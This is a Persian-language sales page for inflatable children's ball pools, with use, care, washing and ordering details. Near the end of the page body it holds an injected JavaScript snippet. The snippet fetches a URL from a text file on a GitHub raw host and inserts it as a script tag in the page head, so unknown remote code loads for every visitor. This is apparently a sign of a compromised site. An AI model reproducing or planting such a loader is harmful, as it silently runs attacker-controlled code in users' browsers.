استخر توپ بادی چیست و چگونه خریداری کنیم؟

استخر توپ بادی چیست و چگونه خریداری کنیم؟

  • استخر توپ بادی به سازه هایی گفته می شود که به صورت فضایی خاص برای استفاده کودکان از توپها می باشد. داخل فضای مکعبی این سازه ها تماما توپ پر می شود.

    محیط مناسب (استخر توپ مهد کودک)

    معمولا این استخر توپ بادی محدودیتی برای جا ندارد. این دستگاه میتواند در مهدکودک ها، خانه بازی ها، شهر بازی ها و گاهی در خانه استفاده گردد. معمولا این محصولات ارتفاع بین 3 تا 3.5 متر را دارد. و اگر در خانه خود یک حیاط کوچک داشته باشید میتوانید ان را استفاده کنید.

    چگونگی استفاده از این دستگاه

    این دستگاه حساسیت ها خاص خودش رو دارد. معمولا اگر در فضای باز از این استخر توپ بادی استفاده می کنید وقتی کار شما با آن تمام شد،روی آن کاور بکشید که افتاب رنگ ان را از بین نبرد. در هنگام باد طوفان های و باران نباید استفاده شود، لازم به ذکر است که حتما به ایمنی های این دستگاه توجه داشته باشید.

    جنس پارچه و دوخت

    جنس پارچه این دستگ از پارچه با کیفیت کره ای می باشد. همچنین دوخت این پارچه با نخ مرغوب ترکیه ای توسط اساتید مجرب مجد سازه دوخته می شود. به سبب جنس و کیفیت بالای این محصولات عمر بسیار طولانی را حاصل می شوند.

    نحوه شست و شو

    این استخر توپ بادی را فقط و فقط با آب بشوید. اگر دستگاه رو با مواد شوینده مانند ریکا، وایتکس و … بشوید دستگاه پوسیده می شود و از بین می رود. متخصیصن ما یک ماده ای برای شستوشوی دستگاهی بادی دارند که می توانید برای خرید با شماره تلفن 09127484573 تماس حاصل فرمایید.

    نحوه خرید استخر توپ بادی

    برای خرید این محصولات می توانید با شماره تلفن 09127484573 تماس حاصل نمایید. همچنین جهت خرید می توانید از طریق راه های ارتباطی تلگرام، واتساپ، ایتا و شبکه های اجتماعی دیگر درخواست خود را جهت خرید به پشتیبانی ما ارائه نمایید. همچنین جهت مشاهده محصولات این دسته می توانید به دسته استخر توپ ها در همین سایت مراجعه نمایید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۲ رای

    دیدگاهتان را بنویسید